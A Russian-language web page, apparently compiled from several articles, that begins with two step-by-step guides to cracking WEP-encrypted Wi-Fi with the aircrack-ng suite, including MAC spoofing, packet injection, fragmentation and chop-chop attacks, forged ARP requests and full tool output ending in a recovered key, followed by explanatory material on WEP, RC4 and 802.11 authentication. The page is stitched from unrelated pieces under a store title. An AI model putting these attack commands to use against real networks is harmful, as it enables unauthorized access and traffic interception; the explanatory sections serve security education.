Wep шифрование: настройка WEP/WPA шифрования в одноранговой беспроводной сети — Эксперт — интернет-магазин электроники и бытовой техники

Содержание

Как взломать Wi-Fi сеть с WEP шифрованием

Как взломать wifi? Многие из нас слышали, что при установке Wi-Fi точки доступа ни в коем случае нельзя выбирать шифрование WEP, поскольку оно очень легко взламывается. Наверное, единицы пробовали делать это самостоятельно, и примерно столько же знают, как это всё на самом деле выглядит. Ниже описан вариант взлома точки с таким протоколом шифрования, так что вы можете более ясно осознать, насколько реальна ситуация, когда к вашей супер секретной точке кто-то подключится, и что вообще представляет собой подобный взлом. Естественно, применять такое на чьём-то чужом роутере ни в коем случае нельзя. Данный материал носит исключительно ознакомительный характер и призывает к отказу от легко взламываемых протоколов шифрования.

Для взлома злоумышленнику понадобится:

подходящий Wi-Fi адаптер с возможностью инъекции пакетов (к примеру, Alfa AWUS036H)
BackTrack Live CD
собственно, ваша точка доступа Wi-Fi с WEP шифрованием, на которой и будет ставиться эксперимент
терпение

После запуска командной строки BackTrack под названием Konsole необходимо ввести следующую команду:

airmon-ng

Вы увидите ваш сетевой интерфейс, который будет называться «ra0» или примерно так. Запомните это название. В дальнейшем он будет обозначаться как (interface), а вы заменяете его на ваше название. Далее вводим последовательно 4 строки:

airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface)

Теперь у нас фейковый MAC адрес. Вводим:

airodump-ng (interface)

Начнёт появляться список доступных беспроводных сетей. Как только в списке появилась нужная сеть, можно нажать Ctrl+C для остановки поиска. Нужно скопировать BSSID сети и запомнить канал (стобец CH). Также убедитесь, что в столбце ENC указан именно WEP.

Теперь начинаем собирать информацию из этой сетки:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

channel — это канал из столбца CH, file name — имя файла в который всё будет писаться, ну а bssid — это идентификатор сети.

Вы увидите нечто подобное на то, что изображено на скриншоте. Оставьте это окно как есть. Откройте новое окно Konsole и введите:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

essid — SSID имя сети-жертвы.

Ждём появление сообщения «Association successful».

Далее вводим:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Теперь нужно проявить всё своё терпение и дождаться, пока число в столбце #Data не перейдёт отметку в 10000.

При достижении требуемого количества собранных данных открываем третье окно Konsole и вводим:

aircrack-ng -b (bssid) (file name-01.cap)

В качестве имени вводится выбранное вами ранее имя для файла.

В случае успеха вы увидите строчку «KEY FOUND», в которой и содержится ключик к сети.

Практическая атака на беспроводную сеть с WEP шифрованием / ХабрТеорию и процесс атаки хорошо описал юзер n3m0 в статьях «Атаки на беспроводные сети». Но практика там описана достаточно слабо.

В данной статье будет описан практический процесс атаки на беспроводную сеть с шифрованием WEP, используя пакет aircrack-ng и операционную систему OpenSuse.

Программы

Данный пакет находится в репозитариях практически всех ОС GNU/Linux. Есть портированная под Windows версия, однако в связи с лучшей поддержкой драйверов в Linux, была выбрана именно данная операционная система.
Установка
# zypper in aircrack-ng

После установки возник вопрос с аппаратной частью. А именно — встроенный в ноутбук Wi-Fi адаптер категорически отказался связываться с точкой по причине низкого уровня сигнала. В результате чего — был взят USB-адаптер TrendNet TEW-424UB.
# lsusb | grep Net Bus 001 Device 002: ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Драйвера адаптера замечательно поддерживают airodump, и для aireplay не пришлось накладывать патч для mac80211.
Ссылка на сайт с совместимостью драйверов
dmesg сообщает нам, что автоматически данный адаптер не поднялся, но нам собственно и не надо:
[ 2609.580074] rtl8187: Customer ID is 0x00 [ 2609.580144] Registered led device: rtl8187-phy1::tx

 
[ 2609.580171] Registered led device: rtl8187-phy1::rx

[ 2617.830502] ADDRCONF(NETDEV_UP): wlan0: link is not ready

Сканирование диапазона
Запускаем адаптер в режиме мониторинга.
# airmon-ng start wlan0

Interface Chipset Driver

eth2 Intel 2200BG ipw2200
wlan0 RTL8187 rtl8187 — [phy1]
(monitor mode enabled on mon0)

Взломом занимается виртуальный адаптер mon0. Оригинальный же адаптер по прежнему находится в режиме management.
# iwconfig wlan0 wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated # iwconfig mon0 mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm

Теперь запускаем процесс сканирования доступных беспроводных сетей.
# airodump-ng mon0

Поля в клиенте означают следующее:

BSSID — MAC адрес точки доступа

PWR — уровень сигнала
Beacons — число служебных пакетов от точки доступа (по росту их числа можно косвенно следить за качеством связи)
#Data — число пойманных пакетов с данными
CH — номера канала на котором находится точка доступа
MB — скорость передачи данных
ENC — алгоритм шифрования
CIPHER — тип шифрования
AUTH — тип авторизации
ESSID — название точки доступа
STATION — MAC адрес клиента
Probes — названия сетей с которыми пытался соединиться клиент

Мы будем пытаться найти уязвимость в сети ESSID. Как видно — она находится на 6 канале. Можно просто указать параметр -c 6 для airodump-ng, но для обучения погасим адаптер и принудительно выставим его на 6 канал:

# airmon-ng stop mon0

mon0 RTL8187 rtl8187 - [phy1] (removed)

# airmon-ng start wlan0 6
 
wlan0 RTL8187 rtl8187 - [phy1]

 (monitor mode enabled on mon0)

В связи с тем, что каналы Wi-Fi сетей частично перекрываются

и настроив на определенный канал, мы получим еще и соседние точки доступа, принудительно выставим использование только определенной частоты и сделаем фильтрацию по BSSID. Параметром -w включается, куда писать пойманные данные.
# airodump-ng -c 6 --bssid 00:1B:11:E7:DD:D5 -w essid.out mon0

Дальше можно либо сидеть и ждать, пока наберется достаточное количество пакетов с данными и переходить непосредственно к подбору ключа, либо использовать активные атаки.

Активные атаки.
Во первых для проверки того, что точка видит наши пакеты и драйвера поддерживают все функции можно попробовать аутентифицироваться на точке. В случае, если клиент не аутентифицирован — то точка не будет принимать его пакеты. Пробуем аутентифицироваться:

# aireplay-ng -1 0 -e ESSID mon0 No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)


19:30:28 Waiting for beacon frame (ESSID: ESSID) on channel 6

Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".

19:30:28 Sending Authentication Request (Open System) [ACK]

19:30:28 Authentication successful

19:30:28 Sending Association Request [ACK]

19:30:28 Association successful :-) (AID: 1)

Заодно проверим работоспособность инъекций.
# aireplay-ng -9 -e ESSID mon0 19:31:35 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID". 19:31:35 Trying broadcast probe requests... 19:31:35 Injection is working! 19:31:36 Found 1 AP 19:31:36 Trying directed probe requests... 19:31:36 00:1B:11:E7:DD:D5 - channel: 6 - 'ESSID' 19:31:37 Ping (min/avg/max): 0.771ms/6.558ms/11.080ms Power: -48.50 19:31:37 30/30: 100%

Успешно. Значит мы можем использовать для данной точки активные атаки.
Деассоциировать имеющегося клиента часто не стоит — можно открыть факт атаки. Поэтому мы будем использовать fragmentation attack.
# aireplay-ng -5 -b 00:1B:11:E7:DD:D5 mon0 No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46) 19:37:26 Waiting for beacon frame (BSSID: 00:1B:11:E7:DD:D5) on channel 6 19:37:26 Waiting for a data packet... Read 362 packets...

Логично, что если точка обладает хотя бы минимальными функциями, то в ней есть CAM таблица и к нам придет широковещательный пакет
Size: 277, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:22:43:01:C6:7F

0x0000: 0842 0000 ffff ffff ffff 001b 11e7 ddd5 .B…………..
0x0010: 0022 4301 c67f 8009 3a1f 0000 0eb0 723b .»C….:…..r;

0x0020: c25a 0453 0691 0afa 5ae3 4365 c309 9094 .Z.S….Z.Ce….
0x0030: b0f9 90a9 65bf 1785 9f0a 65fa ba5a cb7d ….e…..e..Z.}
0x0040: f357 7167 c133 1efd ca2e 4ec9 9133 ea20 .Wqg.3….N..3.
0x0050: e508 c7af fce3 bbf3 599d c4a9 e01d 5e4f ……..Y…..^O
0x0060: 88e8 9997 a5ef 3f0f 058f 3c8a 100f d667 ……?…<….g
0x0070: 2f0f 9f47 a3b0 f4cd 25f8 2cd4 af9e 157c /..G….%.,….|
0x0080: c456 5232 6903 eb5b e935 5dd2 9816 f94c .VR2i..[.5]….L
0x0090: 18ab ea4c aabd 11ed 41a3 88c9 a5ac 726c …L….A…..rl
0x00a0: 3b81 024c 5cfe 24d9 78a5 339b 02aa e147 ;..L\.$.x.3….G
0x00b0: eeb2 512c 1d52 aaa0 2992 88a7 be2a cd6d ..Q,.R..)….*.m
0x00c0: ab44 3248 619c 2402 8cda 621e ed9c 9109 .D2Ha.$…b…..
0x00d0: 62e9 23f7 be38 5f6f bfc9 da45 310a 6957 b.#..8_o…E1.iW
— CUT —

Use this packet ? Y

Saving chosen packet in replay_src-0427-193751.cap
19:38:22 Data packet found!
19:38:22 Sending fragmented packet
19:38:23 No answer, repeating…
19:38:23 Trying a LLC NULL packet
19:38:23 Sending fragmented packet
19:38:25 Not enough acks, repeating…
19:38:25 Trying a LLC NULL packet
19:38:25 Sending fragmented packet
19:38:27 No answer, repeating…
19:38:27 Sending fragmented packet
19:38:27 Got RELAYED packet!!
19:38:27 Trying to get 384 bytes of a keystream
19:38:27 Not enough acks, repeating…
19:38:27 Trying to get 384 bytes of a keystream
19:38:28 No answer, repeating…
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:28 Not enough acks, repeating…
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:30 No answer, repeating…
19:38:30 Trying to get 384 bytes of a keystream
19:38:30 Got RELAYED packet!!
19:38:30 Trying to get 1500 bytes of a keystream
19:38:30 Got RELAYED packet!!
Saving keystream in fragment-0427-193830.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Точка поддерживает fragmentation атаку. В случае, если данная атака не поддерживается — пробуем использовать метод, предложенный korak’ом, называемый chop-chop.
# aireplay-ng -4 -e ESSID mon0 19:42:08 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID". Read 182 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)
…..
Use this packet ? y
Saving chosen packet in replay_src-0427-194221.cap

В результате использования обоих методов, мы получаем xor-файл, в котором содержится PRGA (pseudo random generation algorithm). Теперь мы можем сделать поддельный arp-запрос и использовать его для того, чтобы набрать необходимое число пакетов с данными.
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-193830.xor -w arp-request Wrote packet to: arp-request

Теперь отправим данный пакет в сеть.
# aireplay-ng -2 -r arp-request mon0 No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2

0x0000: 0841 0201 001b 11e7 ddd5 0009 5bec eef2 .A……….[…
0x0010: ffff ffff ffff 8001 471f 0000 548b 4dde ……..G…T.M.
0x0020: 5747 3254 b5ff 7b7d b389 dbe9 7a9e 389c WG2T..{}….z.8.
0x0030: ce3e 85a3 384f 2858 b612 8532 b57e f3ad .>..8O(X…2.~..
0x0040: 420c 26b8 B.&.

Use this packet ? y
Saving chosen packet in replay_src-0427-195956.cap
You should also start airodump-ng to capture replies.

Sent 1301 packets…(500 pps)

При этом должно резко возрасти количество принимаемых пакетов с данными от точки. У меня не возросло. Странно. Попробуем работоспособность инъекций
# aireplay-ng -9 -e ESSID mon0 20:02:47 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID". 20:02:47 Trying broadcast probe requests... 20:02:48 Injection is working! 20:02:48 Found 1 AP

20:02:48 Trying directed probe requests…
20:02:48 00:1B:11:E7:DD:D5 — channel: 6 — ‘ESSID’
20:02:49 Ping (min/avg/max): 0.796ms/6.685ms/10.849ms Power: -48.67
20:02:49 27/30: 90%

Работает. Попробуем переделать arp-запрос, чтобы он исходил как-бы из реальной сети. Обычно пользователи оставляют стандартные адреса 192.168.1.1/24. Используем этот адрес в качестве опрашиваемого. Заодно перезапустим airodump
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 192.168.1.1 -l 192.168.1.250 -y fragment-0427-193830.xor -w arp-request1 Wrote packet to: arp-request1 # aireplay-ng -2 -r arp-request1 mon0 ....... Sent 799 packets...(499 pps)

Вот теперь заработало. Число получаемых пакетов под 300 в секунду.
Меньше, чем через 3 минуты 30 000 пакетов с данными. Попробуем подобрать ключ.
# aircrack-ng essid.out-0*.cap Opening essid.out-01.cap Opening essid.out-02.cap Reading packets, please wait...

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 37621 ivs.
KEY FOUND! [ 51:81:82:41:07 ]
Decrypted correctly: 100%

Забиваем ключ в клиент. Ура, подключились. Теперь можно сделать arp-spoofing и прослушать траффик — но это уже для следующей статьи.

Данная информация приведена только для ознакомления. Автор напоминает вам о Статье 272 УК РФ «Неправомерный доступ к компьютерной информации»

WEP шифрование в Wi-Fi сетях

Введение

Wired Equivalent Privacy (WEP) — устаревший алгоритм для обеспечения безопасности беспроводной IEEE 802.11 сети.

Беспроводные сети с использованием радио в большей степени подвержены прослушиванию, чем проводные.

В 1999 году WEP предназначался для обеспечения конфиденциальности, сопоставимой с проводной сетью. Также WEP — необязательная характеристика стандарта IEEE 802.11, которая используется для обеспечения безопасности передачи данных. Она идентична протоколу безопасности в кабельных локальных сетях без применения дополнительных методов шифрования.

Технология WEP

Согласно стандарту 802.11, шифрование данных WEP используется в следующих целях:

1. Предотвращение несанкционированного доступа к данным при использовании беспроводных сетевых устройств.

2. Предотвращение перехвата трафика беспроводных локальных сетей.

WEP позволяет администратору беспроводной сети определять для каждого пользователя набор ключей, основанный на «строке ключей», которая обрабатывается алгоритмом WEP. Любой пользователь, не имеющий требуемого ключа, не может получить доступ в сеть.

Как указывается в спецификации, WEP использует алгоритм шифрования RC4 с 40-битным или 128-битным ключом. При включении WEP все станции (как клиентские, так и точки доступа) получают свой ключ, который применяется для шифрования данных, прежде чем последние будут переданы на передатчик. Если станция получает пакет, не зашифрованный соответствующим ключом, он исключается из трафика. Этот метод служит для защиты от несанкционированного доступа и перехвата данных.

Начиная с 2001 года ряд серьёзных недостатков, выявленных криптоаналитиками, показали, что сегодня WEP—связи можно взломать за несколько минут. Через несколько месяцев в IEEE была создана новая 802.11i целевая группа по борьбе с проблемами. В 2003 году Wi-Fi Альянс объявил о том, что WEP был заменён на WPA, который представлял собой 802.11i поправку. В 2004 году с момента полного принятия стандарта 802.11i(или WPA2) IEEE заявило что WEP-40 и WEP-104 не рекомендуются, поскольку не выполняют своих обязанностей в области обеспечения безопасности. Несмотря на свои недостатки WEP и сегодня широко используется.

Специалисты, изучающие проблему защиты информации, опубликовали подробный отчет о слабостях в методах кодирования, широко применяемых для засекречивания информации при передаче по беспроводным сетям.

Корень проблемы – имеющиеся лазейки в обеспечении секретности, возникающие от недостатков в алгоритме присвоения кода, используемом в Wired Equivalent Privacy (WEP) — протоколе, являющимся частью сетевого радио-стандарта 802.11.

Уязвимости защиты при радиопередаче данных были широко описаны и прежде, но основное отличие недавно обнаруженного недостатка заключается в том, что его гораздо проще эксплуатировать. По сообщению EE-Times, пассивный перехват зашифрованного текста с дальнейшей обработкой его по методу, предложенному исследователями, позволил бы злоумышленнику с радио LAN-подключением подбирать защитные коды менее чем за 15 минут. Увеличение длины ключа, применяемого при кодировании, не дало бы пользы при отражении нападений, основанных на использовании фундаментальной ошибки, заключающейся в самой методологии используемой техники кодирования.

Механизм шифрования WEP

Шифрование WEP (Wired Equivalent Privacy — секретность на уровне проводной связи) основано на алгоритме RC4 (Rivest’s Cipher v.4 — код Ривеста), который представляет собой симметричное потоковое шифрование. Как было отмечено ранее, для нормального обмена пользовательскими данными ключи шифрования у абонента и точки радиодоступа должны быть идентичными.

Ядро алгоритма состоит из функции генерации ключевого потока. Эта функция генерирует последовательность битов, которая затем объединяется с открытым текстом посредством суммирования по модулю два. Дешифрация состоит из регенерации этого ключевого потока и суммирования его с шифрограммой по модулю два для восстановления исходного текста. Другая главная часть алгоритма — функция инициализации, которая использует ключ переменной длины для создания начального состояния генератора ключевого потока.

RC4 — фактически класс алгоритмов, определяемых размером его блока. Этот параметр n является размером слова для алгоритма. Обычно, n = 8, но в целях анализа можно уменьшить его. Однако для повышения уровня безопасности необходимо задать большее значение этой величины. Внутреннее состояние RC4 состоит из массива размером 2n слов и двух счетчиков, каждый размером в одно слово. Массив известен как S-бокс, и далее он будет обозначаться как S. Он всегда содержит перестановку 2n возможных значений слова. Два счетчика обозначены через i и j.

Алгоритм инициализации RC4

Этот алгоритм использует ключ, сохраненный в Key и имеющий длину l байт. Инициализация начинается с заполнения массива S, далее этот массив перемешивается путем перестановок, определяемых ключом. Так как над S выполняется только одно действие, должно выполняться утверждение, что S всегда содержит все значения кодового слова.

Начальное заполнение массива:

for i = 0 to 2n – 1

{

S[i] = i

j = 0

}

Скрэмблирование:

for i = 0 to 2n – 1

{

j = j + S[i] + Key[i mod l]

Перестановка (S[i], S[j])

}

Генератор ключевого потока RC4 переставляет значения, хранящиеся в S, и каждый раз выбирает новое значение из S в качестве результата. В одном цикле RC4 определяется одно n-битное слово K из ключевого потока, которое в дальнейшем суммируется с исходным текстом для получения зашифрованного текста.

Инициализация:

i = 0

j = 0

Цикл генерации:

i = i + 1

j = j + S[i]

Перестановка (S[i], S[j])

Результат: K = S[S[i] + S[j]].

Особенности WEP-протокола

Достаточно устойчив к атакам, связанным с простым перебором ключей шифрования, что обеспечивается необходимой длиной ключа и частотой смены ключей и инициализирующего вектора;

Самосинхронизация для каждого сообщения. Это свойство является ключевым для протоколов уровня доступа к среде передачи, где велико число искаженных и потерянных пакетов;

Эффективность: WEP легко реализовать;

Открытость;

Использование WEP-шифрования не является обязательным в сетях стандарта IEEE 802.11.

Для непрерывного шифрования потока данных используется потоковое и блочное шифрование.

Потоковое шифрование

При потоковом шифровании выполняется побитовое сложение по модулю 2 (функция “исключающее ИЛИ”, XOR) ключевой последовательности, генерируемой алгоритмом шифрования на основе заранее заданного ключа, и исходного сообщения. Ключевая последовательность имеет длину, соответствующую длине исходного сообщения, подлежащего шифрованию.

Блочное шифрование

Блочное шифрование работает с блоками заранее определенной длины, не меняющейся в процессе шифрования. Исходное сообщение фрагментируется на блоки, и функция XOR вычисляется над ключевой последовательностью и каждым блоком. Размер блока фиксирован, а последний фрагмент исходного сообщения дополняется пустыми символами до длины нормального блока. Например, при блочном шифровании с 16-байтовыми блоками исходное сообщение длиной в 38 байтов фрагментируется на два блока длиной по 16 байтов и 1 блок длиной 6 байтов, который затем дополняется 10 байтами пустых символов до длины нормального блока.

Потоковое шифрование и блочное шифрование используют метод электронной кодовой книги (ECB). Метод ECB характеризуется тем, что одно и то же исходное сообщение на входе всегда порождает одно и то же зашифрованное сообщение на выходе. Это потенциальная брешь в системе безопасности, ибо сторонний наблюдатель, обнаружив повторяющиеся последовательности в зашифрованном сообщении, в состоянии сделать обоснованные предположения относительно идентичности содержания исходного сообщения.

Для устранения указанной проблемы используют:

· Векторы инициализации (Initialization Vectors — IVs).

· Обратную связь (feedback modes).

До начала процесса шифрования 40- или 104-битный секретный ключ распределяется между всеми станциями, входящими в беспроводную сеть. К секретному ключу добавляется вектор инициализации (IV).

Вектор инициализации

Вектор инициализации (Initialization Vector — IV) используется для модификации ключевой последовательности. При использовании вектора инициализации ключевая последовательность генерируется алгоритмом шифрования, на вход которого подается секретный ключ, совмещенный с IV. При изменении вектора инициализации ключевая последовательность также меняется. На рис. 8.3 исходное сообщение шифруется с использованием новой ключевой последовательности, сгенерированной алгоритмом шифрования после подачи на его вход комбинации из секретного ключа и вектора инициализации, что порождает на выходе шифрованное сообщение.

Стандарт IEEE 802.11 рекомендует использовать новое значение вектора инициализации для каждого нового фрейма, передаваемого в радиоканал.

Таким образом, один и тот же нешифрованный фрейм, передаваемый многократно, каждый раз будет порождать уникальный шифрованный фрейм.

Вектор инициализации имеет длину 24 бита и совмещается с 40- или 104-битовым базовым ключом шифрования WEP таким образом, что на вход алгоритма шифрования подается 64- или 128-битовый ключ. Вектор инициализации присутствует в нешифрованном виде в заголовке фрейма в радиоканале, с тем чтобы принимающая сторона могла успешно декодировать этот фрейм. Несмотря на то, что обычно говорят об использовании шифрования WEP с ключами длиной 64 или 128 битов, эффективная длина ключа составляет лишь 40 или 104 бита по причине передачи вектора инициализации в нешифрованном виде. При настройках шифрования в оборудовании при 40-битном эффективном ключе вводятся 5 байтовых ASCII-символов (5×8=40) или 10 шестнадцатеричных чисел (10×4=40), и при 104-битном эффективном ключе вводятся 13 байтовых ASCII-символов (3×8=104) или 26 шестнадцатеричных чисел (26×4=104). Некоторое оборудование может работать со 128-битным ключом.

Слабые места WEP шифрования и примеры атак

Все атаки на WEP основаны на недостатках шифра RC4, таких, как возможность коллизий векторов инициализации и изменения кадров. Для всех типов атак требуется проводить перехват и анализ кадров беспроводной сети. В зависимости от типа атаки, количество кадров, требуемое для взлома, различно. С помощью программ, таких как Aircrack-ng, взлом беспроводной сети с WEP шифрованием осуществляется очень быстро и не требует специальных навыков.

Атака Фларера-Мантина-Шамира

Была предложена в 2001 году Скоттом Фларером, Ициком Мантином и Ади Шамиром. Требует наличия в кадрах слабых векторов инициализации. В среднем для взлома необходимо перехватить около полумиллиона кадров. При анализе используются только слабые векторы. При их отсутствии (например, после коррекции алгоритма шифрования) данная атака неэффективна.

Атака KoreK

В 2004 году была предложена хакером, называющим себя KoreK. Ее особенность в том, что для атаки не требуются слабые вектора инициализации. Для взлома необходимо перехватить несколько сотен тысяч кадров. При анализе используются только векторы инициализации.

Атака Тевса-Вайнмана-Пышкина

Была предложена в 2007 году Эриком Тевсом (Erik Tews), Ральфом-Филипом Вайнманом (Ralf-Philipp Weinmann) и Андреем Пышкиным. Использует возможность инъекции ARP запросов в беспроводную сеть. На данный момент это наиболее эффективная атака, для взлома требуется всего несколько десятков тысяч кадров. При анализе используются кадры целиком.В заключении можно напомнить, что в алгоритме есть множество слабых мест:

механизмы обмена ключами и проверки целостности данных
малая разрядность ключа и вектора инициализации (англ. Initialization vector)
способ аутентификации
алгоритм шифрования.

В 2001 году появилась спецификация WEP-104, которая, тем не менее, не решила проблемы, так как длина вектора инициализации и способ проверки целостности данных остались прежними. В 2004 году IEEE одобрил новые механизмы WPA и WPA2. С тех пор WEP считается устаревшим. В 2008 году вышел стандарт DSS (англ. Data Security Standard) комитета SSC (англ. Security Standards Council) организации PCI (англ. Payment Card Industry) в котором рекомендуется прекратить использовать WEP для шифрования после 30 июня 2010 года.

НОУ ИНТУИТ | Лекция | Технологии безопасности беспроводных сетей и унифицированные решения

Технологии безопасности беспроводных сетей

Говоря о сетевой безопасности как части информационной безопасности объекта, нельзя обойти стороной тему о методах защиты беспроводных сегментов компьютерной сети.

Как уже упоминалось ранее, существует множество технологий, призванных повысить сетевую безопасность, и все они предлагают решения для важнейших компонентов политики в области защиты данных: аутентификации, поддержания целостности данных и активной проверки. Под аутентификацией подразумевается аутентификация пользователя или конечного устройства (хост клиента, сервер, коммутатор, маршрутизатор, межсетевой экран и т.д.) и его местоположения с последующей авторизацией пользователей и конечных устройств. Целостность данных включает такие области, как безопасность сетевой инфраструктуры, безопасность периметра и конфиденциальность данных. Активная проверка помогает удостовериться в том, что установленная политика в области безопасности выдерживается на практике, и отследить все аномальные случаи и попытки несанкционированного доступа.

Стандарт IEEE 802.11 с традиционной безопасностью (Tradition Security Network, TSN) предусматривает два механизма аутентификации беспроводных клиентов: открытую аутентификацию (Open Authentication) и аутентификацию с общим ключом (Shared Key Authentication). Для аутентификации в беспроводных сетях также широко используются два других механизма, которые не являются частью стандарта 802.11, а именно – назначение идентификатора беспроводной локальной сети (Service Set Identifier, SSID) и аутентификация клиента по его MAC-адресу (MAC Address Authentication).

Идентификатор беспроводной локальной сети (SSID) представляет собой атрибут беспроводной сети (так называемое имя сети), позволяющий логически отличать сети друг от друга. Когда пользователь пытается войти в сеть, беспроводной адаптер с помощью программы, прежде всего, сканирует пространство на предмет наличия в ней беспроводных сетей. При применении режима скрытого идентификатора сеть не отображается в списке доступных и подключиться к ней можно только в том случае, если, во-первых, точно известен ее SSID, а во-вторых, заранее создан профиль подключения к этой сети.

Аутентификация в стандарте IEEE 802.11 ориентирована на аутентификацию клиентского устройства радиодоступа, а не конкретного клиента как пользователя сетевых ресурсов (несмотря на то, что в литературе распространено выражение «аутентификация клиента»). Процесс аутентификации клиента беспроводной локальной сети IEEE 802.11 проиллюстрирован на рисунке 2.14 и состоит из следующих этапов:

Клиент посылает кадр (фрейм) запроса Probe Request во все радиоканалы.
Каждая точка радиодоступа (Access Point, AP), в зоне радиуса действия которой находится клиент, посылает в ответ фрейм Probe Response.
Клиент выбирает предпочтительную для него точку радиодоступа и посылает в обслуживаемый ею радиоканал запрос на аутентификацию Authentication Request.
Точка радиодоступа посылает подтверждение аутентификации Authentication Reply.
В случае успешной аутентификации клиент посылает точке доступа запрос на соединение (ассоциирование) Association Request.
Точка доступа посылает в ответ фрейм подтверждения ассоциации Association Response.
Клиент может теперь осуществлять обмен пользовательским трафиком с точкой радиодоступа и проводной сетью.

Аутентификация с общим ключом является вторым методом аутентификации стандарта IEEE 802.11. Процесс аутентификации с общим ключом аналогичен процессу открытой аутентификации, отличаясь тем, что данный метод требует настройки статического ключа шифрования WEP, идентичного на клиентском устройстве (беспроводной адаптер) и на беспроводной точке доступа.

Аутентификация клиента по его MAC-адресу поддерживается многими производителями оборудования для беспроводных сетей, в том числе D-Link. При аутентификации по MAC-адресу происходит сравнение MAC-адреса клиента либо со списком разрешенных (или запрещенных) адресов клиентов, внесенным в МАС-таблицу точки доступа, либо с помощью внешнего сервера аутентификации (рисунок 3.2). Аутентификация по MAC-адресу используется в дополнение к открытой аутентификации и аутентификации с общим ключом стандарта IEEE 802.11 для уменьшения вероятности доступа посторонних пользователей.

Но перечисленные механизмы аутентификации не обеспечат неуязвимость и полную безопасность беспроводной сети.

Идентификатор SSID регулярно передается точками радиодоступа в специальных фреймах Beacon. Любая приемо-передающая станция, расположенная в радиусе действия и поддерживающая стандарт 802.11, может определить SSID с помощью анализатора трафика протокола 802.11. Некоторые точки радиодоступа, в том числе D-Link, позволяют административно запретить широковещательную передачу SSID внутри фреймов Beacon. Однако и в этом случае SSID можно легко определить путем захвата фреймов Probe Response, посылаемых точками радиодоступа. SSID не обеспечивает конфиденциальность данных, данный идентификатор не разрабатывался для использования в качестве механизма обеспечения безопасности. Кроме этого, отключение широковещательной передачи SSID точками радиодоступа может серьёзно отразиться на совместимости оборудования беспроводных сетей различных производителей при использовании в одной беспроводной сети.

Открытая аутентификация не позволяет точке доступа определить, разрешен ли клиенту доступ к сети или нет. Это становится уязвимым местом в системе безопасности в том случае, если в беспроводной локальной сети не используется так называемое WEP-шифрование. В случаях, когда использование WEP-шифрования не требуется или невозможно (например, в беспроводных локальных сетях публичного доступа), методы аутентификации более высокого уровня могут быть реализованы посредством Интернет-шлюзов.

Стандарт IEEE 802.11 требует передачи MAC-адресов клиента и точки радиодоступа в открытом виде. В результате этого в беспроводной сети, использующей аутентификацию по MAC-адресу, злоумышленник может обмануть метод аутентификации путём подмены своего MAC-адреса на разрешенный.

Первым стандартом шифрования данных в беспроводных сетях стал протокол WEP (Wired Equivalent Privacy). Шифрование осуществляется с помощью 40 или 104-битного ключа (поточное шифрование с использованием алгоритма RC4 на статическом ключе) и дополнительной динамической составляющей размером 24 бита, называемой вектором инициализации (Initialization Vector, IV).

Процедура WEP-шифрования выглядит следующим образом. Первоначально передаваемые в пакете данные проверяются на целостность (алгоритм CRC-32) для получения значения контроля целостности (Integrity Check Value, ICV), добавляемого в конец исходного сообщения. Далее генерируется 24-битный вектор инициализации (IV), а к нему добавляется статический (40- или 104-битный) секретный ключ. Полученный таким образом 64- или 128-битный ключ и является исходным ключом для генерации псевдослучайного числа, которое используется для шифрования данных. Далее данные смешиваются (шифруются) с помощью логической операции XOR с псевдослучайной ключевой последовательностью, а вектор инициализации добавляется в служебное поле кадра.

Рис. 3.3. Формат WEP-кадра

Как и любая другая система безопасности на основе паролей, надежность WEP зависит от длины и состава ключа, а также частоты его смены. Первый серьезный недостаток – применение статического ключа – за относительно небольшое время ключ можно подобрать перебором. И второй недостаток WEP-шифрования – самосинхронизация для каждого сообщения, поскольку вектор инициализации передается незашифрованным текстом с каждым пакетом и через небольшой промежуток времени он повторяется. В результате протокол шифрования WEP на основе алгоритма RC4 в настоящее время не является стойким.

Комплексная система обеспечения безопасности беспроводных сетей

На смену WEP пришёл стандарт IEEE 802.11i, представляющий из себя комплексную систему обеспечения безопасности. Эта система включает в себя системы аутентификации, создания новых ключей для каждой сессии, управления ключами (на базе технологии Remote Access Dial-In User Service, RADIUS), проверки подлинности пакетов и т.д.

Разработанный стандарт IEEE 802.11i призван расширить возможности протокола IEEE 802.11, предусмотрев средства шифрования передаваемых данных, а также централизованной аутентификации пользователей и рабочих станций.

